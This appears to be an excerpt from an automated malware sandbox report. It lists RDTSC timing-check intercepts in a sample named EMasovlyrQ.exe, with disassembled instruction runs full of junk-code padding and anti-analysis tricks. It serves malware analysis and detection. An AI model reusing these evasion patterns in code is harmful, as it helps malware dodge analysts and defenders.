Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1305253 second address: 130526F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7C48CABF28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 130526F second address: 1305279 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F7C49018EDCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1306823 second address: 130685D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F7C48CABF27h 0x0000000d jmp 00007F7C48CABF29h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1308425 second address: 130842B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 130842B second address: 1308431 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1307FAD second address: 1307FB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1307FB1 second address: 1307FB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 760009A second address: 76000BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7C49018EE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 76000BF second address: 76000C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 76000C3 second address: 76000C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 76000C9 second address: 76000DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7C48CABF21h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 76000DE second address: 76000E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 76000E2 second address: 760011C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr fs:[00000030h] 0x0000000e jmp 00007F7C48CABF1Dh 0x00000013 sub esp, 18h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F7C48CABF28h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 760011C second address: 7600120 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 7600120 second address: 7600126 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 7600126 second address: 760013F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7C49018EDEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 760013F second address: 7600143 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 7600143 second address: 7600149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 7600149 second address: 760015A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, ecx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push ecx 0x0000000f pop ebx 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 760015A second address: 7600168 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7C49018EDAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 7600168 second address: 7600176 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 7600176 second address: 76001C2 instructions: 0x00000000 rdtsc 0x00000002 mov edi, 6C70FCCAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F7C49018EDBh 0x0000000f xor ax, 076Eh 0x00000014 jmp 00007F7C49018EE9h 0x00000019 popfd 0x0000001a popad 0x0000001b mov ebx, dword ptr [eax+10h] 0x0000001e pushad 0x0000001f mov dh, al 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F7C49018EDFh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 76002C4 second address: 76002DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7C48CABF21h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 76002DA second address: 76002EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7C49018EDCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 76002EA second address: 76002EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 76002EE second address: 7600328 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F7C49018EDAh 0x00000010 and cx, EDE8h 0x00000015 jmp 00007F7C49018EDBh 0x0000001a popfd 0x0000001b push esi 0x0000001c pop ecx 0x0000001d popad 0x0000001e mov dword ptr [esp], edi 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F7C49018EDCh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 7600328 second address: 76003CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7C48CABF21h 0x00000008 mov ah, E3h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d call dword ptr [75980B60h] 0x00000013 mov eax, 75F3E5E0h 0x00000018 ret 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F7C48CABF29h 0x00000020 adc esi, 686A8C16h 0x00000026 jmp 00007F7C48CABF21h 0x0000002b popfd 0x0000002c mov ebx, ecx 0x0000002e popad 0x0000002f push 00000044h 0x00000031 pushad 0x00000032 mov dx, cx 0x00000035 movzx ecx, bx 0x00000038 popad 0x00000039 pop edi 0x0000003a pushad 0x0000003b mov cx, dx 0x0000003e jmp 00007F7C48CABF29h 0x00000043 popad 0x00000044 xchg eax, edi 0x00000045 pushad 0x00000046 mov ecx, 37FCBFF3h 0x0000004b mov di, ax 0x0000004e popad 0x0000004f push eax 0x00000050 pushad 0x00000051 push edx 0x00000052 mov ebx, ecx 0x00000054 pop eax 0x00000055 mov dh, C3h 0x00000057 popad 0x00000058 xchg eax, edi 0x00000059 push eax 0x0000005a push edx 0x0000005b jmp 00007F7C48CABF21h 0x00000060 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 76004B1 second address: 76004B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 76004B7 second address: 76004BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 76004BB second address: 76004E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F7CB73480BBh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F7C49018EE5h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 76004E0 second address: 76004E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 76004E6 second address: 76004EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 76004EA second address: 76004FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, 00000000h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 76004FD second address: 760050E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7C49018EDDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 760050E second address: 7600542 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F7C48CABF23h 0x00000008 pop eax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esi], edi 0x0000000e jmp 00007F7C48CABF1Fh 0x00000013 mov dword ptr [esi+04h], eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 7600542 second address: 760055D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7C49018EE7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 760055D second address: 760057D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esi+08h], eax 0x0000000d pushad 0x0000000e movsx edi, si 0x00000011 mov eax, 317F3F65h 0x00000016 popad 0x00000017 mov dword ptr [esi+0Ch], eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 760057D second address: 7600581 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 7600581 second address: 760059E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7C48CABF29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 760059E second address: 76005A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 76005A4 second address: 76005A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 7600755 second address: 7600773 instructions: 0x00000000 rdtsc 0x00000002 mov bl, cl 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esi+28h], eax 0x0000000a pushad 0x0000000b mov edx, 5D13313Ch 0x00000010 mov cx, di 0x00000013 popad 0x00000014 mov eax, dword ptr [ebx+68h] 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push eax 0x0000001b pop edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 7600773 second address: 7600778 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 7600778 second address: 760077E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 760077E second address: 7600782 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 7600782 second address: 76007A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7C49018EDDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+2Ch], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 76007A0 second address: 76007AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7C48CABF1Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 76007AF second address: 76007B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 76007B3 second address: 76007D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ax, word ptr [ebx+6Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7C48CABF20h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 76007D1 second address: 76007FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7C49018EDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [esi+30h], ax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F7C49018EE5h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 76007FB second address: 760087F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7C48CABF21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, word ptr [ebx+00000088h] 0x00000010 jmp 00007F7C48CABF1Eh 0x00000015 mov word ptr [esi+32h], ax 0x00000019 pushad 0x0000001a call 00007F7C48CABF1Eh 0x0000001f mov ebx, esi 0x00000021 pop esi 0x00000022 mov edx, 2BC2D552h 0x00000027 popad 0x00000028 mov eax, dword ptr [ebx+0000008Ch] 0x0000002e jmp 00007F7C48CABF29h 0x00000033 mov dword ptr [esi+34h], eax 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F7C48CABF28h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 760087F second address: 7600883 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 7600883 second address: 7600889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 7600889 second address: 76008DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, esi 0x00000005 jmp 00007F7C49018EE8h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [ebx+18h] 0x00000010 jmp 00007F7C49018EE0h 0x00000015 mov dword ptr [esi+38h], eax 0x00000018 jmp 00007F7C49018EE0h 0x0000001d mov eax, dword ptr [ebx+1Ch] 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 mov ecx, ebx 0x00000025 pushad 0x00000026 popad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 76008DA second address: 76009A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7C48CABF24h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+3Ch], eax 0x0000000c pushad 0x0000000d movzx ecx, di 0x00000010 mov esi, ebx 0x00000012 popad 0x00000013 mov eax, dword ptr [ebx+20h] 0x00000016 jmp 00007F7C48CABF25h 0x0000001b mov dword ptr [esi+40h], eax 0x0000001e pushad 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F7C48CABF1Ah 0x00000026 or ax, EA78h 0x0000002b jmp 00007F7C48CABF1Bh 0x00000030 popfd 0x00000031 mov esi, 5AEA1DAFh 0x00000036 popad 0x00000037 pushfd 0x00000038 jmp 00007F7C48CABF24h 0x0000003d jmp 00007F7C48CABF25h 0x00000042 popfd 0x00000043 popad 0x00000044 lea eax, dword ptr [ebx+00000080h] 0x0000004a pushad 0x0000004b mov si, 9F23h 0x0000004f mov edi, eax 0x00000051 popad 0x00000052 push 00000001h 0x00000054 jmp 00007F7C48CABF22h 0x00000059 nop 0x0000005a pushad 0x0000005b movzx esi, bx 0x0000005e mov bx, 04FEh 0x00000062 popad 0x00000063 push eax 0x00000064 push eax 0x00000065 push edx 0x00000066 jmp 00007F7C48CABF1Bh 0x0000006b rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 76009A1 second address: 76009B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7C49018EE4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 76009B9 second address: 7600A27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jmp 00007F7C48CABF27h 0x0000000e lea eax, dword ptr [ebp-10h] 0x00000011 jmp 00007F7C48CABF26h 0x00000016 nop 0x00000017 jmp 00007F7C48CABF20h 0x0000001c push eax 0x0000001d jmp 00007F7C48CABF1Bh 0x00000022 nop 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F7C48CABF25h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 7600A27 second address: 7600A2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 7600A2D second address: 7600A31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 7600A56 second address: 7600A71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7C49018EE7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 7600A71 second address: 7600A96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7C48CABF29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 7600A96 second address: 7600AA9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7C49018EDFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 7600AA9 second address: 7600AFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7C48CABF1Fh 0x00000008 pushfd 0x00000009 jmp 00007F7C48CABF28h 0x0000000e sub al, FFFFFFC8h 0x00000011 jmp 00007F7C48CABF1Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a test edi, edi 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F7C48CABF25h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 7600AFF second address: 7600B5A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7C49018EE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F7CB7347A85h 0x0000000f pushad 0x00000010 call 00007F7C49018EDCh 0x00000015 pushfd 0x00000016 jmp 00007F7C49018EE2h 0x0000001b sub cx, EBB8h 0x00000020 jmp 00007F7C49018EDBh 0x00000025 popfd 0x00000026 pop eax 0x00000027 mov di, 62FCh 0x0000002b popad 0x0000002c mov eax, dword ptr [ebp-0Ch] 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 7600B5A second address: 7600B5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 7600B5E second address: 7600B62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 7600B62 second address: 7600B68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 7600B68 second address: 7600BF8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7C49018EDFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+04h], eax 0x0000000c pushad 0x0000000d push eax 0x0000000e pushfd 0x0000000f jmp 00007F7C49018EDBh 0x00000014 adc ecx, 7FD97ADEh 0x0000001a jmp 00007F7C49018EE9h 0x0000001f popfd 0x00000020 pop esi 0x00000021 mov esi, edx 0x00000023 popad 0x00000024 lea eax, dword ptr [ebx+78h] 0x00000027 jmp 00007F7C49018EE3h 0x0000002c push 00000001h 0x0000002e jmp 00007F7C49018EE6h 0x00000033 nop 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F7C49018EE7h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 7600BF8 second address: 7600C5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7C48CABF1Fh 0x00000009 jmp 00007F7C48CABF23h 0x0000000e popfd 0x0000000f mov bh, al 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov si, dx 0x0000001b pushfd 0x0000001c jmp 00007F7C48CABF23h 0x00000021 or ah, FFFFFFBEh 0x00000024 jmp 00007F7C48CABF29h 0x00000029 popfd 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 7600C5D second address: 7600CCC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7C49018EE7h 0x00000009 adc ecx, 673F57CEh 0x0000000f jmp 00007F7C49018EE9h 0x00000014 popfd 0x00000015 movzx esi, dx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b nop 0x0000001c jmp 00007F7C49018EE3h 0x00000021 lea eax, dword ptr [ebp-08h] 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F7C49018EE5h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 7600CCC second address: 7600CD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 7600CD2 second address: 7600CD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 7600CD6 second address: 7600D0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007F7C48CABF24h 0x0000000e mov dword ptr [esp], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F7C48CABF27h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 7600D76 second address: 7600DE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 call 00007F7C49018EE8h 0x0000000b pop eax 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f test edi, edi 0x00000011 jmp 00007F7C49018EE1h 0x00000016 js 00007F7CB73477E4h 0x0000001c jmp 00007F7C49018EDEh 0x00000021 mov eax, dword ptr [ebp-04h] 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 pushfd 0x00000028 jmp 00007F7C49018EDCh 0x0000002d jmp 00007F7C49018EE5h 0x00000032 popfd 0x00000033 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 7600DE8 second address: 7600E39 instructions: 0x00000000 rdtsc 0x00000002 call 00007F7C48CABF20h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushfd 0x0000000b jmp 00007F7C48CABF1Bh 0x00000010 sub ah, 0000003Eh 0x00000013 jmp 00007F7C48CABF29h 0x00000018 popfd 0x00000019 popad 0x0000001a mov dword ptr [esi+08h], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F7C48CABF1Dh 0x00000024 rdtsc
